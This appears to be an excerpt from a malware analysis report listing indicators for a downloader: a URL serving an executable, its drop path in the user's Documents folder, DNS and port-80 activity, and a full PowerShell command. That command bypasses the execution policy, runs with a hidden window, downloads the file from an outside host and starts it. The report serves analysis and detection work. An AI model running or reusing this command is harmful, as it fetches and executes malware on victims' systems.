Technical Information
- http://purchase.lottoprize.us/rfq-euf5089.exe as rfq-euf5089.exe
- %HOMEPATH%\documents\rfq-euf5089.exe
- 'pu#####e.lottoprize.us':80
- http://pu#####e.lottoprize.us/RFQ-EUF5089.exe
- DNS ASK pu#####e.lottoprize.us
- '%HOMEPATH%\documents\rfq-euf5089.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy bypass -noprofile -windowstyle hidden -command (New-Object System.Net.WebClient).DownloadFile('http://purchase.lottoprize.us/RFQ-EUF5089.exe','RFQ-EUF5089.exe');Start-Process '...' (with hidden window)